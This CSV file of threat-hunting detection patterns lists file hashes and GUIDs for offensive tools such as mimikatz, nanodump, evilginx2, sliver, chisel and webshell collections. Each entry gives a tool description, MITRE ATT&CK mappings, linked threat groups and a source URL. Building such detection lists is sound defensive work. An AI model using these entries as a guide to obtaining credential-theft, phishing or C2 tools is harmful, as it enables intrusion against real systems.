"*971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b*",".{0,1000}971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31511"
"*971EA5AE1205C3DC4693EED2C730D21E00022E9EA17D5928C2695749D68BB7A7*",".{0,1000}971EA5AE1205C3DC4693EED2C730D21E00022E9EA17D5928C2695749D68BB7A7.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31513"
"*971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0*",".{0,1000}971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","31514"
"*972963c83a5b6277233d9c33536b666a296b02137a267f685f7845e0b848d10b*",".{0,1000}972963c83a5b6277233d9c33536b666a296b02137a267f685f7845e0b848d10b.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31516"
"*9734db4d2d53bb15ae0f8214595a7a781df78445811dd5d1a16319dea549ea39*",".{0,1000}9734db4d2d53bb15ae0f8214595a7a781df78445811dd5d1a16319dea549ea39.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31518"
"*9738590e365bc9b2c9baecbdbda391f294e1b991fe3744ac4b8c2107bf730565*",".{0,1000}9738590e365bc9b2c9baecbdbda391f294e1b991fe3744ac4b8c2107bf730565.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","31519"
"*973d217af2a0f2b65c7000cffa1fea57cb816d97bb41775201342138029f132d*",".{0,1000}973d217af2a0f2b65c7000cffa1fea57cb816d97bb41775201342138029f132d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31520"
"*97484211-4726-4129-86AA-AE01D17690BE*",".{0,1000}97484211\-4726\-4129\-86AA\-AE01D17690BE.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#GUIDProject","N/A","8","1","N/A","N/A","N/A","N/A","31521"
"*9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe*",".{0,1000}9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31522"
"*97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739*",".{0,1000}97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31523"
"*974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696*",".{0,1000}974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","31526"
"*975b49f84c3e34d26052f938c50aa5856cccbbdf32e9e4698cebba577ed10c8c*",".{0,1000}975b49f84c3e34d26052f938c50aa5856cccbbdf32e9e4698cebba577ed10c8c.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31528"
"*97646f306c4b95f9733ee383923b7b8c954cd74715ff548ea42c8ae18fb2f67d*",".{0,1000}97646f306c4b95f9733ee383923b7b8c954cd74715ff548ea42c8ae18fb2f67d.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31530"
"*97699449246070bc8195e1cf1f14b94dc2ee429cb03128bb7e7e254981eb71a0*",".{0,1000}97699449246070bc8195e1cf1f14b94dc2ee429cb03128bb7e7e254981eb71a0.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","31531"
"*976be04b1a0791888458a62b8218aa07452684394512e4c49add14aadc036eac*",".{0,1000}976be04b1a0791888458a62b8218aa07452684394512e4c49add14aadc036eac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31532"
"*9786E418-6C4A-471D-97C0-8B5F2ED524C8*",".{0,1000}9786E418\-6C4A\-471D\-97C0\-8B5F2ED524C8.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#GUIDproject","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","31534"
"*978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a*",".{0,1000}978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31535"
"*979ace218709961112c1d80bfac298c5cf6b2b92a798b0af012aab2dd45ba2c1*",".{0,1000}979ace218709961112c1d80bfac298c5cf6b2b92a798b0af012aab2dd45ba2c1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31538"
"*97ab5a4ff291a46ece4aebafa570869cbb74a5a285769c641c257cdbbf13744f*",".{0,1000}97ab5a4ff291a46ece4aebafa570869cbb74a5a285769c641c257cdbbf13744f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31539"
"*97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46*",".{0,1000}97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","31540"
"*97b5f34a741ea6fd544439fbd6614de3960e82ae56c8ef02399ea8935816994d*",".{0,1000}97b5f34a741ea6fd544439fbd6614de3960e82ae56c8ef02399ea8935816994d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31542"
"*97b8b52dd9cc10504a350236aa9dc2fc91a9162c013189004c1b13e189d21dea*",".{0,1000}97b8b52dd9cc10504a350236aa9dc2fc91a9162c013189004c1b13e189d21dea.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31543"
"*97b8d3a33ca3a06d24553a8ea8a5a89520ebe15655fa338b2f7c7c8883ae38da*",".{0,1000}97b8d3a33ca3a06d24553a8ea8a5a89520ebe15655fa338b2f7c7c8883ae38da.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","31544"
"*97c0e103700b9f2464000cb63e10b68a4305dd33*",".{0,1000}97c0e103700b9f2464000cb63e10b68a4305dd33.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","31546"
"*97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369*",".{0,1000}97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31548"
"*97cb8247ff30cc1aa0bfd279da92894f288e4bc985441f10ababfe22caed984e*",".{0,1000}97cb8247ff30cc1aa0bfd279da92894f288e4bc985441f10ababfe22caed984e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31550"
"*97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147*",".{0,1000}97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31551"
"*97d14bd510bfca62bca0d884ad7953e044355e4d1cc198471b678f4201e5eb02*",".{0,1000}97d14bd510bfca62bca0d884ad7953e044355e4d1cc198471b678f4201e5eb02.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31552"
"*97d5f4e3388f23242edbd69a62412396e557290ac5b8f468c625255fbbc4546b*",".{0,1000}97d5f4e3388f23242edbd69a62412396e557290ac5b8f468c625255fbbc4546b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31553"
"*97de480818edd99fc1a118eb9e832db08910eb44cc3b53ebfd534b6c3afe4ee4*",".{0,1000}97de480818edd99fc1a118eb9e832db08910eb44cc3b53ebfd534b6c3afe4ee4.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","31555"
"*97e2d2cf16103f9149b1fcf33d5e982fb9f37f0bbbadfe787634b277b5f65f78*",".{0,1000}97e2d2cf16103f9149b1fcf33d5e982fb9f37f0bbbadfe787634b277b5f65f78.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31556"
"*97e6a954a2bb21afcc7eeab6ec6d95c6c174ebb7b5fd1da881ab51f74dc944c7*",".{0,1000}97e6a954a2bb21afcc7eeab6ec6d95c6c174ebb7b5fd1da881ab51f74dc944c7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31557"
"*97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449*",".{0,1000}97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31558"
"*97f7f1ee8228a28173f07062e712dfaa25f64cfcf443a7f1d26c9502f6046b50*",".{0,1000}97f7f1ee8228a28173f07062e712dfaa25f64cfcf443a7f1d26c9502f6046b50.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#filehash","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","31559"
"*98063f3e117a093aee435c3b1130f770b9a98022165356ff1679a6f33a61e1e5*",".{0,1000}98063f3e117a093aee435c3b1130f770b9a98022165356ff1679a6f33a61e1e5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31561"
"*980b1116ad7c83280e58fa50c2fc66c4d596a04b64be88b19faac781416aa9a3*",".{0,1000}980b1116ad7c83280e58fa50c2fc66c4d596a04b64be88b19faac781416aa9a3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31562"
"*980EF05F-87D1-4A0A-932A-582FB1BC3AC3*",".{0,1000}980EF05F\-87D1\-4A0A\-932A\-582FB1BC3AC3.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","#GUIDproject","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","31564"
"*981d1e5d88087f716ebb0cf8b39ffe7d3e44c36bc1e34452c8eaf2eaa56c05f9*",".{0,1000}981d1e5d88087f716ebb0cf8b39ffe7d3e44c36bc1e34452c8eaf2eaa56c05f9.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","31565"
"*98259461df694aaf1b39e3964495efa332ebcae4e1c5dddcb4169fb0a16fca91*",".{0,1000}98259461df694aaf1b39e3964495efa332ebcae4e1c5dddcb4169fb0a16fca91.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31566"
"*982e0bbb1c1ee2c49d3be4ad0a076a402d8c07a9712bbf2244c39d5550b37587*",".{0,1000}982e0bbb1c1ee2c49d3be4ad0a076a402d8c07a9712bbf2244c39d5550b37587.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31569"
"*9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45*",".{0,1000}9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31572"
"*983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61*",".{0,1000}983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31574"
"*9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae*",".{0,1000}9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31575"
"*9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae*",".{0,1000}9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31576"
"*98449032055b0658d49bc712656d9ccddb13d46c87d623344fd1829601b3ec7f*",".{0,1000}98449032055b0658d49bc712656d9ccddb13d46c87d623344fd1829601b3ec7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31577"
"*98456f61bb55fd826a5def604590780b552a261249ee82cf1969008fc67b40bf*",".{0,1000}98456f61bb55fd826a5def604590780b552a261249ee82cf1969008fc67b40bf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31578"
